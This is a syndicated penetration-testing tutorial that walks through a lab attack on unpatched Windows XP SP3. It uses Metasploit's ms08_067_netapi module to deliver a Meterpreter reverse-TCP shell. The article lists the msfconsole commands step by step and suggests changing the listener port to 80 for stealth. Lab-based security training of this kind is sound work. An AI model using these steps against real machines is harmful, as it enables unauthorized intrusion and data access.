Exploiting Windows XP Using Kali Linux

In this article, we’ll walk you through how to exploit a live install of Windows XP Service Pack 3. We’ll make use of the well-known vulnerability in the netapi32.dll in the Windows Operating System.
The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.

Penetration Testing: A Hands-On Introduction to Hacking

Penetration Testing: A Hands-On Introduction to Hacking

This article is inspired by the book Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman. 

The exploit module we’ll make use of through the Metasploit framework is called exploit/windows/smb/ms08_067_netapi

Before continuing with this tutorial, you’ll need to:

  • Have a virtual machine running Kali Linux.
  • Have a virtual machine running an unpatched version of Windows XP Service Pack 3.
  • Have basic knowledge of the Linux command line.

Please note that it is illegal to perform this attack without the victim’s permission!

Using Metasploit to exploit Windows XP

Start off by firing up both virtual machines.

Log in to Kali Linux, and fire up a terminal window.

Terminal window in Kali Linux

Terminal window in Kali Linux

The first thing we’ll need to do is to start the Metasploit Framework. 

Enter these commands into the terminal window:

  • service postgresql start
  • msfconsole

The first command, “service postgresql start,” launches a PostgreSQL database, which Metasploit uses to track your commands.

The next command, “msfconsole,” launches the Metasploit text-based console. This is where we’ll perform our attack.

After “msfconsole” has finished loading (which can take a while), you should see something like this:

msfconsole in kali linux

Msfconsole in Kali Linux

As previously mentioned, we’ll use the module, exploit/windows/smb/ms08_067_netapi. We tell metasploit which module to use by entering the following command:

  • use windows/smb/ms08_067_netapi

Now that we’ve told Metasploit which exploit module we’d like to use, we need to set some options. Enter this into the command line to show all available options:

  • show options

showing options in metasploit

Showing options in metasploit

As you see, there are not many options that need to be set.

  • RHOST: This is the target machine’s IP-address. We’ll set this in the next step.
  • RPORT: This is the port we’ll perform our attack through. The default of 445 is fine.
  • SMBPIPE: The browser is the correct SMBPIPE for this attack.
  • Exploit Target: This is the target operating system. Automatic targeting is fine for this attack.

In other words, the only option we’ll need to set is the target IP-address. You can find the target IP-address by running “ipconfig” in cmd on your Windows VM. In my case, the IP-address is

  • set RHOST

The exploit module is now configured and ready to go. But, we’ll also have to tell Metasploit which payload it should install on the target machine. In this attack, we’ll use the payload “windows/meterpreter/reverse_tcp.”

  • set payload windows/meterpreter/reverse_tcp

setting up the exploit in metasploit

Setting up the exploit in metasploit

The payload windows/meterpreter/reverse_tcp will create a reverse shell.

A reverse shell will push a connection from the target machine (windows) back to the attacker (Kali).
In practice, this means that our Kali machine will open a local port and listen for a connection from the target machine on port 4444 (LPORT).

Note that this isn’t stealthy at all. You should at least change the LPORT to a regular port number like 80 (HTTP) to have any chance of succeeding.

You may have noticed that the LHOST field doesn’t contain anything. We’ll need to set LHOST to our Kali IP-address, which is in my case.

The payload needs this information so the victim machine can connect back to the attacking machine.

  • set LHOST

Everything’s now set up in Metasploit. Before proceeding, make sure that the Windows firewall is deactivated on your Windows VM.

You should also create a txt-file on your desktop in the Windows VM. The content can be anything you like; we’ll just use it to illustrate the power of this attack.

Now that you’re all set and ready to go, let’s exploit the target machine. Type this command to proceed:

Exploiting Windows XP SP3 Using Kali Linux

Exploiting Windows XP SP3 Using Kali Linux

We’re in!

What has actually happened here?

When exploiting our target machine (Windows XP), we delivered a payload, which initiated a reverse shell connection.

The reverse shell made our target machine connect back to the attacking machine (Kali Linux), providing a shell connection directly to the Windows Operating System.

Let’s navigate to the file we created earlier in the Desktop folder (on the Administrator user in my case):

Using meterpreter

Using meterpreter

Now, we only need to navigate to the Desktop folder and view the content of the file using the “cat” command.

exploit/windows/smb/ms08_067_netapi in kali

exploit/windows/smb/ms08_067_netapi in kali

Congratulations! You have now gained access to a remote Windows XP operating system, using the exploit/windows/smb/ms08_067_netapi exploit!

This UrIoTNews article is syndicated fromDzone